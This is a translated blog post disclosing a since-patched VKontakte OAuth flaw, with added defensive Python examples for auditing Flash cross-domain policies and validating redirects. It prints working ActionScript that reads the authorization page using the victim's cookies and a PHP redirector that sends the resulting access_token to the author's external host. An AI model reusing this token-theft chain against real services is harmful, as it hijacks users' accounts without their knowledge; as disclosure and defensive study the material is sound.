
Getting access to the VKontakte API methods without the user's knowledge

Introduction


I found this vulnerability about two months ago, possibly even earlier.
I then sent the details to the developers, and they fixed it successfully.
Or so it seemed to me at the time.

It soon became clear that they had not fixed it at all, but had merely restricted access to messages, which is what I had pointed out to the developers back then.

Below the cut I will try to describe the process of obtaining access in sufficient detail.

Search


The idea that the API could be accessed without the user's knowledge came to me almost immediately, as soon as I started working with the methods for Standalone applications.
By then VK was already using OAuth authentication.
There was nothing particularly ingenious about it: the OAuth authorization page lived on the same domain as API 2.0, and was therefore covered by the same crossdomain.xml file, which allowed requests from any server.
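The weak point above is a Flash cross-domain policy that allows every origin on a host which also serves the authorization page. The following is an added example, not code from the original post: a small audit function that parses a crossdomain.xml and flags that configuration, shown against a constructed permissive policy and a constructed restricted one (the hostnames in the samples are hypothetical).

```python
"""Audit a crossdomain.xml Flash policy for the weakness described above: a
wildcard allow-access-from on a host that also serves the OAuth authorization
page lets a Flash movie from any origin read that page, cookies included.
Added example; the policies below are constructed, not VK's real files."""
import xml.etree.ElementTree as ET

# Constructed sample: the permissive shape the post describes.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>"""

# Constructed sample: one named partner host, https-only, master policy only.
RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="widgets.example.com" secure="true" />
</cross-domain-policy>"""


def audit_crossdomain(policy_xml, serves_auth=True):
    """Return a list of finding strings; an empty list means nothing flagged.

    serves_auth: True when the same host also serves login/OAuth pages, which
    is what turns a permissive policy into a token-leak risk.
    """
    findings = []
    root = ET.fromstring(policy_xml)

    # A master policy that lets any path publish its own policy widens the
    # attack surface to every directory on the host.
    site_control = root.find("site-control")
    if site_control is not None and \
            site_control.get("permitted-cross-domain-policies") == "all":
        findings.append("low: permitted-cross-domain-policies=all lets any "
                        "path on the host publish its own policy")

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            # Any origin may load this host's responses with the user's
            # cookies attached; fatal when the host serves auth pages.
            severity = "high" if serves_auth else "medium"
            findings.append(f"{severity}: domain=\"*\" lets Flash content from "
                            "any origin read responses with the user's cookies")
        elif domain.startswith("*."):
            findings.append(f"low: subdomain wildcard {domain}; every "
                            "subdomain must be trusted")
        # secure="false" lets http-served Flash read https responses.
        if rule.get("secure", "true").lower() == "false":
            findings.append(f"medium: secure=\"false\" for {domain} lets plain "
                            "http content read https responses")
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY),
                         ("restricted", RESTRICTED_POLICY)):
        print(name, audit_crossdomain(policy) or "no findings")
```

The structural fix the post implies is the restricted shape: keep the authorization endpoint on a host with no wildcard policy (or no policy at all), and name only the specific partner hosts that genuinely need cross-domain reads.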

Without hesitation, I started writing the implementation.

Usage


Let me warn readers about two things right away:


My cunning, insidious plan was this: the user would be sent to a Flash application that fetches the authorization page and then parses the authorization link out of it.

Let's go.

Point one: the Flash application.

Since a Flash movie can make cross-domain requests freely wherever a suitable crossdomain.xml is present, this was the only way to obtain the authorization link cleanly.

The Flash code is straightforward, and yet this was probably the hardest part, at least for me, because I barely know ActionScript.

import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.events.Event;

var auth_page = new URLLoader();
this.addEventListener(Event.ADDED_TO_STAGE, onAddedToStage);

function onAddedToStage(e:Event):void {
    auth_page.addEventListener(Event.COMPLETE, auth_load);
    // load the authorization page; the browser attaches the user's VK cookies
    auth_page.load(new URLRequest('http://api.vkontakte.ru/oauth/authorize?client_id=2725857&scope=offline,ads,notifications,groups,wall,questions,offers,pages,notes,docs,video,audio,photos,friends,notifi&redirect_uri=http://api.vk.com/blank.html&display=page&response_type=token'));
}

function auth_load(e:Event):void {
    var wrapper:Object = Object(parent.parent);
    var auth_str = auth_page.data;
    trace();
    // cut the link out of the page after "location.href" and pass it to the
    // iframe application, which performs the redirect
    wrapper.external.navigateToURL(new URLRequest('http://vkontakte.ru/app2725881#' + auth_str.toString().substr(auth_str.indexOf("location.href") + 17, 162)));
}


There is one small trick.
A Flash application cannot simply redirect on its own, because of browser security policies.
But VK had (more precisely, used to have; it has since been removed from the docs) a special method for redirecting the user to a page inside VKontakte.
This was not much of a problem, though, because there are iframe applications, and those can redirect wherever they want.

Point two: the iframe application.

In the iframe application we need to redirect the user to the given URL after making a couple of replacements.

<?php header('Location: ' . str_replace(array('https', 'blank.html'), array('http', '//thecops.ru/hi.php'), $_GET['hash'])); ?>
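The iframe handler above forwards the user to whatever arrives in the request parameter, which is the open-redirect behaviour the chain relies on. As an added example (not code from the original post), here is the hardened shape of such a redirector in Python: only an absolute https URL whose host is on an explicit allowlist is accepted, everything else falls back to a fixed page. The allowlisted host and the inputs are constructed for illustration.

```python
"""Hardened counterpart to the redirect handler above: send the user only to
an absolute https URL whose host is on an allowlist. Added example; the
allowlisted host is hypothetical."""
from urllib.parse import urlsplit

# Hosts the redirector may send users to (constructed example).
ALLOWED_REDIRECT_HOSTS = frozenset({"app.example.com"})


def safe_redirect_target(raw_target, allowed_hosts=ALLOWED_REDIRECT_HOSTS):
    """Return raw_target if it is a safe redirect destination, else None.

    Rejects scheme-relative URLs (//other.example), non-https schemes,
    embedded credentials (https://trusted@other.example) and any host that
    is not exactly on the allowlist.
    """
    if not isinstance(raw_target, str) or len(raw_target) > 2048:
        return None
    # Control characters and backslashes invite parser disagreement between
    # this check and the browser; refuse them outright.
    if any(ord(c) < 0x20 for c in raw_target) or "\\" in raw_target:
        return None
    try:
        parts = urlsplit(raw_target)
    except ValueError:  # e.g. malformed IPv6 literal
        return None
    if parts.scheme != "https":
        return None
    if parts.username is not None or parts.password is not None:
        return None
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return None
    return raw_target


def location_header(raw_target, fallback="https://app.example.com/"):
    """Value for the Location header: the validated target or a safe fallback."""
    return safe_redirect_target(raw_target) or fallback


if __name__ == "__main__":
    # Constructed inputs: one legitimate target and several shapes the
    # original handler would have forwarded unchanged.
    for candidate in ("https://app.example.com/done#access_token=x",
                      "//other.example/hi.php",
                      "http://app.example.com/done",
                      "https://app.example.com@other.example/",
                      "https://app.example.com.other.example/x"):
        print(candidate, "->", location_header(candidate))
```

Exact host matching (rather than a substring or prefix check) is what defeats the look-alike host in the last sample, and rejecting userinfo is what defeats the trusted-name-before-@ trick.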


And that is all.
On the hi.php page we receive an access_token with permissions for every method except messages.

A working example could be seen here.
Thanks for your attention.
UPD:
A fix has been made, and very quickly.
The example no longer works.

Source: https://habr.com/ru/post/135036/

